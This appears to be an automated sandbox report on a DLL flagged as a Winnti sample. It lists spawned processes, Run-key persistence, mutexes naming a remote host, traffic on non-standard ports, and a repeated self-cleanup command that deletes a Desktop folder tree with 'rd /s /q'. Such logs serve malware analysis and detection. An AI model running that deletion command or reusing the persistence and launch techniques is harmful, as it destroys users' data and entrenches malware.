Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: QCTYoyX422.dllStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engineClassification label: mal100.troj.spyw.evad.winDLL@42/11@48/5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000404F AdjustTokenPrivileges,3_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10003FB7 CreateToolhelp32Snapshot,3_2_10003FB7
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\Desktop\12010043Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3780
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\host123.zz.am:6658
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Mhost123.zz.am:6658
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3852
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\959a49ad-652b-45ae-bb57-67bda4b3468dJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg
Source: QCTYoyX422.dllReversingLabs: Detection: 78%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 668
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlgJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,PrintFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlgJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",PrintFileJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvcp60.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507225694.0000000002791000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507250715.000000000278B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.*\*.* source: rundll32.exe, 00000003.00000003.4481849158.000000000276E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*.* source: rundll32.exe, 00000003.00000003.4508123861.000000000276E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003900A push dword ptr [esp+4Ch]; retn 0050h3_2_1003901C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10027023 push dword ptr [esp+18h]; retn 001Ch3_2_1002A254
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F024 push dword ptr [esp+14h]; retn 0018h3_2_1002F036
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10029029 push dword ptr [esp+38h]; retn 003Ch3_2_10027C71
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10029029 pushad ; mov dword ptr [esp], 73E57D1Ah3_2_10029046
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003B02D push dword ptr [esp+50h]; retn 0054h3_2_1003B061
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F039 push esp; mov dword ptr [esp], B1CF2C6Dh3_2_1002F051
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F039 push dword ptr [esp+50h]; retn 0054h3_2_1002F068
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10035048 push dword ptr [esp+50h]; retn 0054h3_2_100351D7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10033059 push dword ptr [esp+50h]; retn 0054h3_2_1003307F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10033064 push dword ptr [esp+50h]; retn 0054h3_2_1003307F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002D06D push dword ptr [esp+38h]; retn 003Ch3_2_1002D08D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10031079 push dword ptr [esp+30h]; retn 0034h3_2_10031095
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10027080 push ebp; mov dword ptr [esp], edx3_2_1002FD0B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10027080 push dword ptr [esp+04h]; retn 0008h3_2_1002FD4E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10023085 push dword ptr [esp+38h]; retn 003Ch3_2_10023093
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10023096 push dword ptr [esp+50h]; retn 0054h3_2_100230B3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100330A5 push dword ptr [esp+2Ch]; retn 0030h3_2_1002B78C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100330A5 push dword ptr [esp+04h]; retn 0008h3_2_1003B2DF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100230B6 push dword ptr [esp+34h]; retn 0038h3_2_1002F874
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100270BA push dword ptr [esp+34h]; retn 0038h3_2_1002AD33
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100250BC push dword ptr [esp+44h]; retn 0048h3_2_1003408E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F0D4 push dword ptr [esp+0Ch]; retn 0014h3_2_1002F0EF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100270D4 push dword ptr [esp+0Ch]; retn 0010h3_2_100282E3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100270D4 push dword ptr [esp+0Ch]; retn 0010h3_2_100338DA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100350D9 push dword ptr [esp+50h]; retn 0054h3_2_10035102
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100250D9 push dword ptr [esp+14h]; retn 0018h3_2_100250F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002B0E4 push dword ptr [esp+48h]; retn 004Ch3_2_1002B0FD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002D0EF push dword ptr [esp+10h]; retn 0014h3_2_1002D116
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002B0EF push dword ptr [esp+48h]; retn 004Ch3_2_1002B0FD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10039107 push dword ptr [esp+4Ch]; retn 0050h3_2_10039116

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dtfdJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dtfdJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dtfdJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 18659
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50371 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50690 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50692 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50820 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50962 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50967 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51148 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51158 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51331 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51337 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51553 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51561 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51803 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51810 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52806 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52999 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55398 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55399 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 58021 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59600 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59752 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62270 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62271 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 65081 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 65116 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51144 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53634 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53692 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55778 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55836 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 57965 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 58045 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60319 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60345 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62729 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62825 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51340 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52889 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52993 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55567 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55602 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 57794 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 57903 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60361 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62635 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62667 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64311 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64313 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52832 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52878 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 54804 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 54823 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 56893 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59231 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59313 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 61952 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62045 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 63790 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 63809 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64715 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64718 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52686 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52688 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53487 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53534 -> 23588
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
